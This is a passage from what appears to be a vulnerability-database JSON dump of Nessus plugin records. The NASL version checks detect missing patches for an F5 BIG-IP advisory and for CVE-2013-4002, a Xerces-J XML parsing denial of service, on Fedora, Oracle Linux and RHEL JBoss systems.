! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL16872\";\nvmatrix = make_array();\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1HF1\",\"11.5.4HF2\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:03:51", "bulletinFamily": "scanner", "description": "Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2014-10649.NASL", "href": "https://www.tenable.com/plugins/nessus/77868", "published": "2014-09-26T00:00:00", "title": "Fedora 19 : xerces-j2-2.11.0-15.fc19 (2014-10649)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10649.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77868);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:06:07 $\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"FEDORA\", value:\"2014-10649\");\n\n script_name(english:\"Fedora 19 : xerces-j2-2.11.0-15.fc19 (2014-10649)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1019176\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138577.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5036fed9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"xerces-j2-2.11.0-15.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:41:23", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2014:1319 :\n\nUpdated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2014-1319.NASL", "href": "https://www.tenable.com/plugins/nessus/77978", "published": "2014-09-30T00:00:00", "title": "Oracle Linux 6 / 7 : xerces-j2 (ELSA-2014-1319)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1319 and \n# Oracle Linux Security Advisory ELSA-2014-1319 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77978);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/30 10:58:19\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"RHSA\", value:\"2014:1319\");\n\n script_name(english:\"Oracle Linux 6 / 7 : xerces-j2 (ELSA-2014-1319)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:1319 :\n\nUpdated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004494.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004495.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-xni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-j2-2.11.0-17.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-j2-demo-2.11.0-17.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-2.11.0-17.el7_0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2 / xerces-j2-demo / xerces-j2-javadoc / etc\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:53:48", "bulletinFamily": "scanner", "description": "Updated packages that provide Red Hat JBoss Enterprise Application\nPlatform 6.3.2 and fix one security issue, several bugs, and add\nvarious enhancements are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes\nbug fixes and enhancements. A list of these changes is available from\nthe JBoss Enterprise Application Platform 6.3.2 Downloads page on the\nCustomer Portal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red\nHat Enterprise Linux 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2014-1818.NASL", "href": "https://www.tenable.com/plugins/nessus/79115", "published": "2014-11-11T00:00:00", "title": "RHEL 6 : JBoss EAP (RHSA-2014:1818)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1818. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79115);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_xref(name:\"RHSA\", value:\"2014:1818\");\n\n script_name(english:\"RHEL 6 : JBoss EAP (RHSA-2014:1818)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages that provide Red Hat JBoss Enterprise Application\nPlatform 6.3.2 and fix one security issue, several bugs, and add\nvarious enhancements are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes\nbug fixes and enhancements. A list of these changes is available from\nthe JBoss Enterprise Application Platform 6.3.2 Downloads page on the\nCustomer Portal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red\nHat Enterprise Linux 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-4002\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf-xjc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cxf-xjc-boolean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cxf-xjc-dv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cxf-xjc-ts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-hal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-appclient\");\n script_set_attribute(attribute:\"cpe\", 